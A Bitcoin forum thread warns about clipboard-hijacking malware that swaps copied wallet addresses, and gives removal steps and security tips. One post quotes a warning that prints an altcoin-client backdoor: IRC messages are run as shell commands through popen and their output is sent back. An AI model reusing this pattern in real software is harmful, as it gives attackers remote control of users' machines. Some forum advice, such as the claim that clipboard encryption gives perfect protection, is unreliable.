Bitcoin Forum

Bitcoin => Bitcoin Discussion => Topic started by: Hailedllama on August 31, 2015, 02:25:54 PM

Title: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 02:25:54 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Title: Re: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 02:42:57 PM
it happened to me about a hour ago but heres a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or
AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described
in the first point you can't delete one of the folder.
If you've deleted the Adobe folder it won't start again on your
computer, so you're good, but to completly remove it you have to
do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin

Title: Re: Bitcoin Malware
Post by: Snorek on August 31, 2015, 03:25:11 PM
it happened to me about a hour ago but heres a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or
AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described
in the first point you can't delete one of the folder.
If you've deleted the Adobe folder it won't start again on your
computer, so you're good, but to completly remove it you have to
do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin
You mean that you can have your own version of this Malware with your own address for $1. That's sick. I was worried about new kind of malwares and viruses associated with bitcoin and here they are.
So far I know about this Malware changing address and another that encodes data on your disks and then want bitcoin to decypher it. New technologies, new threats.

Title: Re: Bitcoin Malware
Post by: Aggressor66 on August 31, 2015, 03:37:18 PM
Malwarebytes’ Anti-Malware is currently one of the most successful tools at identifying and removing the types of malware that we’re talking about here.
It’s not really a replacement for anti-virus software but in cases of infection, it has a pretty darn good track record.
Download the free version, install and run it, and then see what it turns up.

Title: Re: Bitcoin Malware
Post by: LiteCoinGuy on August 31, 2015, 03:47:50 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

it is safer to store your coins on a hardware wallet:

Title: Re: Bitcoin Malware
Post by: tadakaluri on August 31, 2015, 04:17:57 PM
it happened to me about a hour ago but heres a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or
AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described
in the first point you can't delete one of the folder.
If you've deleted the Adobe folder it won't start again on your
computer, so you're good, but to completly remove it you have to
do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin

Thank you very much for the valuable information.  I need to check my PC and gadgets, is they already infected with this Malware or not? Once again thank you very much for this information.

Title: Re: Bitcoin Malware
Post by: nero987 on August 31, 2015, 04:23:44 PM
This is arround for some time already...
It first came up on Evo market arround 1 month before the exit scam.
I have the source code of v1.3 here.
Before you compile the malware you set some parameters, which include the process name.
In Snorek's "examples" its Chrome32.exe or AcroRd32.exe, but it can be literally everything.

About anti malware:
The program does not make any connection to the internet, for this reason it is almost never picked up by anti-virus/malware software.
When a particular compilation of the malware (with particular process name) is reported to an antivirus database, only that version will be picked up by av's...
There are some av's that notice that part of the code is comparable to know malware, but thats only a minority of the av's....

damn, practice your english nero!

edit: I'm not selling/sharing the source code, neither sharing any detailled information how it actually works!

Title: Re: Bitcoin Malware
Post by: ikydesu on August 31, 2015, 07:32:07 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

There are a lot malware out there come from related bitcoin service. I personally always check and scanned the site first when i want to visit, especially with a site which strange or fishy for me. This some tips for make your PC secure and avoid any virus/malware:

Title: Re: Bitcoin Malware
Post by: Mickeyb on August 31, 2015, 08:33:38 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

it is safer to store your coins on a hardware wallet:

Doesn't this malware work even if you use a Trezor for example? I guess that people should be always careful and double check. MyTrezor Web wallet works in the browser as well.

The truth of the matter is that everybody should be double checking are addresses changed. If anybody  can have a copy of this malware for a $1, this means that this malware can become very widespread.

Title: Re: Bitcoin Malware
Post by: Meuh6879 on August 31, 2015, 08:38:48 PM
Chrome is the malware.

it seems logical ...  ;D

Title: Re: Bitcoin Malware
Post by: Gyfts on August 31, 2015, 08:45:38 PM
Important to note that there are countless types of malware that can infect your PC and steal your wallet.  A virus that copies and pastes the wrong address seems like something that would be easy to catch, at least for me as I double check addresses before sending. Keyloggers are probably the most notable or taking people's bitcoin, or RATs. Both are very easy to steal Bitcoin while the owner of the wallet is away from their computer and unaware of their PC being infected.

Title: Re: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 09:49:24 PM
im glad i could help everyone but just because your internet security says its ok still be cautious because there are ways around internet security. There is alot of software like this being sold for like $2-$5 some even give it out for free so be careful

Title: Re: Bitcoin Malware
Post by: Carlton Banks on August 31, 2015, 09:58:17 PM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

Title: Re: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 10:01:33 PM
i would love to use linux but my wifi stick doesnt have the drivers for linux

Title: Re: Bitcoin Malware
Post by: Hailedllama on August 31, 2015, 10:08:03 PM
Damn that looks good i would buy it but i just lost my money to this stupid malware  >:(

Title: Re: Bitcoin Malware
Post by: Carlton Banks on August 31, 2015, 10:19:37 PM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.
If you are looking for a linux version that has a windows feel I suggest Linux Mint, you can use wine for most windows programs but games have a lot of compatibility issues.

Don't forget linux is free :

Yes, Mint is excellent for new Linux users, it's really easy to install and is very forgiving when it comes to using peripherals with it. At least compared to other Linux distros anyway.

Be careful everybody with Linux if you have a brand new, latest Intel chip computer. Sometimes the newest hardware isn't supported properly yet, so either wait till the hardware is 6 months or so old, or wait that long till you try Linux on it. Or you could be brave  :D It is a brave move, though.

Title: Re: Bitcoin Malware
Post by: Jeremycoin on August 31, 2015, 10:41:32 PM
Wow that could be a serious problem, but I always checked twice when I want to send a Bitcoin.

Title: Re: Bitcoin Malware
Post by: zero01 on August 31, 2015, 10:49:13 PM
thank you for the information you provided
I would be more careful

Title: Re: Bitcoin Malware
Post by: rinhunter on August 31, 2015, 10:53:06 PM
Wow that could be a serious problem, but I always checked twice when I want to send a Bitcoin.

Great, so we as users have to remain cautious.
very serious, for those who frequently send BTC in large amount.

Title: Re: Bitcoin Malware
Post by: Coinshot on August 31, 2015, 11:42:25 PM
Just wanted to add this; Sometimes mallwares makes additional registry entry to both CurrentVersion\Run" and CurrentVersion\RunOnce"
So it's best to check both, because one can copy the instance back to every registry entry, forcing you back to square one.

Title: Re: Bitcoin Malware
Post by: cellard on August 31, 2015, 11:54:44 PM
So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

Title: Re: Bitcoin Malware
Post by: Habeler876 on September 01, 2015, 12:04:45 AM
So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

I can't say for sure in this case, but mostly people get infected with mallware binded to some legit .exe, or via Java-drive-by. In either case both browsers are not to blame,
since it's not an exploit of sorts, but rather a diversion (jdb mostly asks you to update codecs, or update java version.. etc)

Title: Re: Bitcoin Malware
Post by: maokoto on September 01, 2015, 01:07:40 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

Title: Re: Bitcoin Malware
Post by: RGBKey on September 01, 2015, 01:10:14 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.

Title: Re: Bitcoin Malware
Post by: Carlton Banks on September 01, 2015, 01:11:27 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

Don't just check the address you're sending to, check the change address for that transaction also, it too can be substituted for an attacker's address.

Title: Re: Bitcoin Malware
Post by: nero987 on September 01, 2015, 06:17:27 AM
So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc :P).
Meanwhile there are dozens of "new" versions of this malware with other process names then "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an adress is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.

Title: Re: Bitcoin Malware
Post by: S4VV4S on September 01, 2015, 07:32:15 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.

That is true, but it's usually the simple things in life that work better ;)

Title: Re: Bitcoin Malware
Post by: flock123 on September 01, 2015, 07:48:50 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

Thanks for sharing this info. It is amazing the genius of malware programmers ... changing the copied address.... shocking.

I mean honestly that's not really that genius. Anyone that knows windows programming can check every time something is copied to the clipboard, see if it's a bitcoin address and then replace it with their own.

That is true, but it's usually the simple things in life that work better ;)
I think also that, if it wants to avoid malware such, we must also have a strong security system in our computer

Title: Re: Bitcoin Malware
Post by: neoneros on September 01, 2015, 08:42:31 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

it is safer to store your coins on a hardware wallet:

it is, but sometimes you need to pay for something online, you need to copy the addresses, it might be easier to check and find the flaw, but it is still a risk that the address sending too is changed when copy-pasted.

Thanks for the warning, do scan my devices regularly, not just for the bitcoin, better safe than sorry.

Title: Re: Bitcoin Malware
Post by: RustyNomad on September 01, 2015, 08:52:23 AM
Thanks to OP for the warning and reminding us that we are all targets in one way or another.

Guess we will see more and more of this kind of malware and even more so when the bitcoin price is high again.

Just glad I'm using a Trezor but there are still times where I just copy an address from Electrum (Trezor watch only wallet) to paste it into a website. Will make a point in future to double check addresses and not just the first 3 and last 3 characters as I usually do.

Title: Re: Bitcoin Malware
Post by: louise123 on September 01, 2015, 08:55:34 AM
I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?

Title: Re: Bitcoin Malware
Post by: nero987 on September 01, 2015, 10:54:02 AM
I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?

Like I've mentionned above, this particular part of malware is mostly distributed through pdf's...

Title: Re: Bitcoin Malware
Post by: Carlton Banks on September 01, 2015, 11:37:01 AM
I will assume that the OP ran an executable that was from an untrustworthy supplier.
Why do people do that?

I am really curious to know the reason the OP ran that executable.
What was it disguised as?
What was it meant to be instead of a malware?

Like I've mentionned above, this particular part of malware is mostly distributed through pdf's...

There's a safe .pdf reader in the OS I use ( It converts the vector data in the .pdf into a bitmap, and deletes the original .pdf, along with all the scripting that can secrete any malware. Linux only.  

Title: Re: Bitcoin Malware
Post by: Amph on September 01, 2015, 11:40:24 AM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

or simply don't download random stuff from the web, problem solved, i still have my hot wallet intact, since years, and no malware has stole anything from my desktop

malware do not infect your pc without you doing something wrong

Title: Re: Bitcoin Malware
Post by: NeuroticFish on September 01, 2015, 11:43:53 AM
Chrome is the malware.

it seems logical ...  ;D

You made me doublecheck :)
As usual, the malware seems to be using names quite similar with known software.
The normal browser is chrome.exe, not chrome32.
I guess that the same story goes to acrobat reader too, but since I don't use it I cannot check.

But really, the ones who run windoze with no antivirus on... they just ask for it.

Title: Re: Bitcoin Malware
Post by: medUSA on September 01, 2015, 11:53:15 AM
As bitcoin grows in popularity, more of these malware will creep up to steal your coins. I believe a dedicated machine (PC or phone) for bitcoin with nothing else installed is the only way out of this. If these malware replaces bitcoin address while we copy and paste, even hardware wallets are vulnerable. :-[

Title: Re: Bitcoin Malware
Post by: Carlton Banks on September 01, 2015, 11:56:10 AM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.

or simply don't download random stuff from the web, problem solved, i still have my hot wallet intact, since years, and no malware has stole anything from my desktop

malware do not infect your pc without you doing something wrong

Feeling confident about opening .pdfs? Or browsing unknown websites?

I've only got 1 PC (well, and a Raspberry Pi), it seems like overkill to have a separate PC just for bitcoin, but I guess it's been successful in keeping your coins safe.

If these malware replaces bitcoin address while we copy and paste, even hardware wallets are vulnerable. :-[

Not with the Trezor hardware wallet. It has a screen that displays the address you're sending to before you sign the transaction.

Title: Re: Bitcoin Malware
Post by: lite on September 01, 2015, 12:21:57 PM
Linux is the best if you want protection against malware. Also if you're doing larger transaction it's recommended to use live Linux OS from your USB. I prefer to use Ubuntu, but there are lots of other Linux OS one can choose. ;)

Title: Re: Bitcoin Malware
Post by: mallard on September 01, 2015, 12:22:58 PM
Do any of the popular virus scanners detect this?

Title: Re: Bitcoin Malware
Post by: XCASH on September 01, 2015, 12:40:46 PM
Do any of the popular virus scanners detect this?

I don't know, but you can't always rely on virus scanners to detect something. The quote below is stickied at the top of the alt coin board, but some of it also applies to Bitcoin. Hackers can make crypted malware that virus scanners don't detect.

Also hackers can code apparently useful legit software that uses such simple techniques to steal wallets that it goes undetected by virus scanners. It's obvious from the source code that there's wallet stealing code there, but very few people read source code before using software.

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code (
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
here is the source code with macros resolved:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Title: Re: Bitcoin Malware
Post by: nero987 on September 01, 2015, 12:41:39 PM
Do any of the popular virus scanners detect this?

If the particular version of the malware you received is not yet flagged by your av: No it doesn't.

This is arround for some time already...
It first came up on Evo market arround 1 month before the exit scam.
I have the source code of v1.3 here.
Before you compile the malware you set some parameters, which include the process name.
In Snorek's "examples" its Chrome32.exe or AcroRd32.exe, but it can be literally everything.

About anti malware:
The program does not make any connection to the internet, for this reason it is almost never picked up by anti-virus/malware software.
When a particular compilation of the malware (with particular process name) is reported to an antivirus database, only that version will be picked up by av's...
There are some av's that notice that part of the code is comparable to know malware, but thats only a minority of the av's....

damn, practice your english nero!

edit: I'm not selling/sharing the source code, neither sharing any detailled information how it actually works!

So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc :P).
Meanwhile there are dozens of "new" versions of this malware with other process names then "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an adress is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.

It is hard to get picked up by av's just because the malware doesn't connect to the internet...

Title: Re: Bitcoin Malware
Post by: wearehatetherules on September 05, 2015, 04:45:40 AM
i never heard before about this,it that reallly exist?

Title: Re: Bitcoin Malware
Post by: ranochigo on September 05, 2015, 07:24:56 AM
So can someone tell me what the source of the malware is? Is it something that infects chrome? In that case im safe? I use Mozilla firefox. Thanks for the heads up anyway.

It has nothing to do with chrome itself. The first version of this malware that was sold advised to use "chrome.exe" as process name, because it would look least suspicious (as long as you do have chrome on your pc :P).
Meanwhile there are dozens of "new" versions of this malware with other process names then "chrome.exe".
This malware is mostly injected in a pdf!

The copied address gets replaced 5-15% of the times an adress is copied.
The first 3-6 characters of the "new" address will be the same as the first characters of the originally copied address.

It is hard to get picked up by av's just because the malware doesn't connect to the internet...
Antiviruses usually check the application's signature and match it against their database. If it matches, the antivirus would flag it. This would require you to have the latest database download. I have to say the virus would be quite intensive to carry out on a large scale. If the address gets replaced with an address that has a first few address identical to it, they need to generate a large amount of vanity addresses or even use the victim's computer to generate one and send the private key to the server. This has to be done in a fast pace unless a fake lag can be implemented when the address is being paste.

Antivirus won't be foolproof and people can use crypter to avoid detections by antiviruses.

Title: Re: Bitcoin Malware
Post by: Hopalong on September 05, 2015, 08:20:01 AM
i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi use intel drivers in windows but it was produced by broadcom so i had to get broadcom drivers to get it working in linux.

About linux security...   I have an old laptop with ubuntu.  It is formated corectly with a partisjon for each user level and cryptated. I have lost the password and it is impossible to get in. No live cd can start and it is no way to get to the disks. Even a mini linux on a usb stick cant read the disks.

Title: Re: Bitcoin Malware
Post by: mallard on September 05, 2015, 09:19:04 AM
i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi use intel drivers in windows but it was produced by broadcom so i had to get broadcom drivers to get it working in linux.

About linux security...   I have an old laptop with ubuntu.  It is formated corectly with a partisjon for each user level and cryptated. I have lost the password and it is impossible to get in. No live cd can start and it is no way to get to the disks. Even a mini linux on a usb stick cant read the disks.

Do you need to recover the files, or do you just want the laptop working again?
You should be able to just use a program like dd to clear out the disk, and then you will be able to install an operating system again.

Title: Re: Bitcoin Malware
Post by: RealBitcoin on September 05, 2015, 01:12:30 PM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.
If you are looking for a linux version that has a windows feel I suggest Linux Mint, you can use wine for most windows programs but games have a lot of compatibility issues.

Don't forget linux is free :

Is linuxmint more secure than ubuntu?

What are the differences between the 2?

What about keyloggers, webcam trojans, clipboard stealers, kernel malware and screen capture malware?

Title: Re: Bitcoin Malware
Post by: Hopalong on September 05, 2015, 01:56:06 PM
i would love to use linux but my wifi stick doesnt have the drivers for linux

I bet there are drivers around. Sometimes you have to search to find out what hardware you have and not what it is labeled with.

On my reserve laptop the wifi use intel drivers in windows but it was produced by broadcom so i had to get broadcom drivers to get it working in linux.

About linux security...   I have an old laptop with ubuntu.  It is formated corectly with a partisjon for each user level and cryptated. I have lost the password and it is impossible to get in. No live cd can start and it is no way to get to the disks. Even a mini linux on a usb stick cant read the disks.

Do you need to recover the files, or do you just want the laptop working again?
You should be able to just use a program like dd to clear out the disk, and then you will be able to install an operating system again.

Everything important was backed up on an external disk so my data was safe. I have not checked if gparted can read the partisions yet but i think it should. I do have a bit of fun trying to get acces to the disks.

I have tried to secure a disk in windows but every live cd was able to read it. Dont get why linux is so much better at this.

Title: Re: Bitcoin Malware
Post by: mallard on September 05, 2015, 02:59:38 PM

No anti-this and anti-that software. Ditch Windows and use Linux, you'll avoid most of these types of attacks.
If you are looking for a linux version that has a windows feel I suggest Linux Mint, you can use wine for most windows programs but games have a lot of compatibility issues.

Don't forget linux is free :

Is linuxmint more secure than ubuntu?

What are the differences between the 2?

What about keyloggers, webcam trojans, clipboard stealers, kernel malware and screen capture malware?

Linux Mint is based on Ubuntu.
There isn't much difference between the two.

Title: Re: Bitcoin Malware
Post by: confirmation120 on September 05, 2015, 04:22:56 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)
Didn't know this kind of malware exists. I need to check and scan my laptop right away after reading this

Title: Re: Bitcoin Malware
Post by: seVell on September 09, 2015, 11:40:38 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)

it is safer to store your coins on a hardware wallet:

Doesn't this malware work even if you use a Trezor for example? I guess that people should be always careful and double check. MyTrezor Web wallet works in the browser as well.

The truth of the matter is that everybody should be double checking are addresses changed. If anybody  can have a copy of this malware for a $1, this means that this malware can become very widespread.

Not to mention that you have to trust the hardware manufacturer and the seller and probably other middle-mans.

Title: Re: Bitcoin Malware
Post by: Remember remember the 5th of November on September 10, 2015, 01:23:53 AM
Chrome is the malware.

it seems logical ...  ;D

You made me doublecheck :)
As usual, the malware seems to be using names quite similar with known software.
The normal browser is chrome.exe, not chrome32.
I guess that the same story goes to acrobat reader too, but since I don't use it I cannot check.

But really, the ones who run windoze with no antivirus on... they just ask for it.
That's very clever. Since Chrome spawns multiple instances of itself, it can be very easy to disguise a process with the same name, nobody will be any wiser.

Title: Re: Bitcoin Malware
Post by: Kakmakr on September 10, 2015, 06:02:30 AM
Just check the address after you pasted it, and you would be fine.  ;) I have 1 FREE anti-virus software package and 1 Full commercial version installed on one computer, and I have had no problems at all so far. < Avast & Kaspersky > Luckily these two has not clashed, because they usually do.

Keep some honey traps around to trigger flags when possible hacks are being done on you. <Small amounts of coins in wallets, easily accessible> When they are empty and you have not done that, you know you are compromised.   

Title: Re: Bitcoin Malware
Post by: Q7 on September 10, 2015, 10:14:42 AM
If you can afford it, get two pc. I have with myself one with a lower spec which is connected to the internet all the time and i even use it for installing untrusted new software. The other one is basically most of the time offline and no other software installed in it except browsers, together with my hot wallet

Title: Re: Bitcoin Malware
Post by: pooya87 on September 10, 2015, 11:50:28 AM
If you can afford it, get two pc. I have with myself one with a lower spec which is connected to the internet all the time and i even use it for installing untrusted new software. The other one is basically most of the time offline and no other software installed in it except browsers, together with my hot wallet

you don't need to spend that much in order to have a secure environment that you can safely install and use a bitcoin wallet.
all you need is a USB disk which is super cheep , and linux that you can download free (like Ubuntu).

1) make persistent live linux on the USB disk
2) change a couple of settings so that it would never connect to network.
3) install your favorite bitcoin wallet

**) don't forget to check the signature of both linux and bitcoin wallet

Title: Re: Bitcoin Malware
Post by: JohnBelfast on September 10, 2015, 11:51:38 AM
Most alt coin wallets have some sort of virus in it. Go to altcoin discussion and you wil find a thread which highlights all the coins with viruses and exposed them with code refernces

Title: Re: Bitcoin Malware
Post by: zero01 on September 10, 2015, 12:29:44 PM
it happened to me about a hour ago but heres a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or
AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described
in the first point you can't delete one of the folder.
If you've deleted the Adobe folder it won't start again on your
computer, so you're good, but to completly remove it you have to
do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin

The information that is helpful friend
I hope with this information, our friends the others do not get bitcoin  malware

Title: Re: Bitcoin Malware
Post by: RealBitcoin on September 10, 2015, 04:21:18 PM
it happened to me about a hour ago but heres a guide on how to get rid of it if it is on your pc
Remove the malware
Finally remove it from your computer:
Start Windows Task Manager and terminate the Chrome32.exe or
AcroRd32.exe process!
Go to %appdata% in your file browser.
Delete AppData/Roaming/Adobe (x86) folder.
Delete AppData/Local/Google (x86) folder.
If you don't terminate the malware manually, as it is described
in the first point you can't delete one of the folder.
If you've deleted the Adobe folder it won't start again on your
computer, so you're good, but to completly remove it you have to
do one more thing:

Start the Registry Editor (regedit) and delete our software from
If you don't find it, check HKEY_LOCAL_MACHINE instead of

hope it helps this malware is being sold for $1.10 in bitcoin

This virus is just easier to bypass if you just encrypt your clipboard. Its a clipboard virus so if anything tries to modify it, it will be signalled as a modified encryption cant be decrypted after.

There are many tools that can help you with that, so you will be perfectly protected agains all kinds of clipboard attacks.

Title: Re: Bitcoin Malware
Post by: balvio on May 23, 2016, 12:52:58 PM
thank you for posting such things, I am a newbie so I find them useful

Title: Re: Bitcoin Malware
Post by: Viyamore on May 23, 2016, 01:04:30 PM
Thank you also for these tutorial information many viruses now are scatteeing on internet ,sometimes google if i open these forum ,virus on battery  . I do close it always not cleaning then if i will clean its recommend an app to download and to install i think it is a propaganda or tactics for them to use the application to earn money.

But i don't encountered yet that bitcoin malwares i think my malwares is on browser.

Title: Re: Bitcoin Malware
Post by: Gaugh on May 23, 2016, 01:16:38 PM
Most alt coin wallets have some sort of virus in it. Go to altcoin discussion and you wil find a thread which highlights all the coins with viruses and exposed them with code refernces

Well, an altcoin paper wallet cannot have a virus in it. :-\

Title: Re: Bitcoin Malware
Post by: InsideBjorn on May 23, 2016, 01:53:42 PM
There are allot of bitcoin malware going around these days. They are so stupid and are able to steal your coins so be careful people and use nice antiu malware bots to locate the bitcoin ones and at least remove them.

Title: Re: Bitcoin Malware
Post by: maudevang on May 23, 2016, 08:27:29 PM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)
Yeah you need to watch out with this, hackers are always active at the places were it is about money. Make sure that keep a eye out fort this sort things because it can happen out of nowhere.

Title: Re: Bitcoin Malware
Post by: davinchi on May 23, 2016, 08:57:09 PM
Most alt coin wallets have some sort of virus in it. Go to altcoin discussion and you wil find a thread which highlights all the coins with viruses and exposed them with code refernces

Well, an altcoin paper wallet cannot have a virus in it. :-\
But not all users use paper wallets. Actually, not all even knows of paper wallets.
The point here is that viruses/malwares/infections are really easy to get without knowing, unless we have the proper tools and softwares for it.

Title: Re: Bitcoin Malware
Post by: Akupuniard on May 23, 2016, 09:14:59 PM
Malware is so annoying nowdays, also with windows 10, you can get it from everywhere without any protection. Many anti-virus programs also can alert you about it.

Title: Re: Bitcoin Malware
Post by: Icathia on May 24, 2016, 08:46:47 AM
I have to look out for this they are trying to steal your information and maybe your Bitcoins from you. Always keep check of what you are doing because there is always a chance that you will get a virus.

Title: Re: Bitcoin Malware
Post by: quentincole32 on May 24, 2016, 09:33:29 AM
i recently found a malware that changes bitcoin addresses when copied to the hackers address so just watch out and check to make sure that the bitcoin address you copy comes out the same when you paste it  :)
never know about this case and kind malware like that,its terrible hacker,i dont think its can be done by hacker,they should be pro and smart hacker.
thanks for sharing,even you dont put any proff,but its make us know about new case in bitcoin hacking.

Title: Re: Bitcoin Malware
Post by: Juventino02 on May 24, 2016, 06:10:14 PM
I have been similar situation. some chaptcha sites writ that they found dublicate IP or they wrote they add me as scamr. and why? they block my IP. I talk about sites which pays 1000 or more.. sometimes, they wrote that 1000 satoshi sent your account, after that I chack my account and there not any satoshis. it seems, there are scammers as a captcha sites or there are scammer who changes the wallet address. who was in this situation?

Title: Re: Bitcoin Malware
Post by: mobnepal on May 24, 2016, 06:20:20 PM
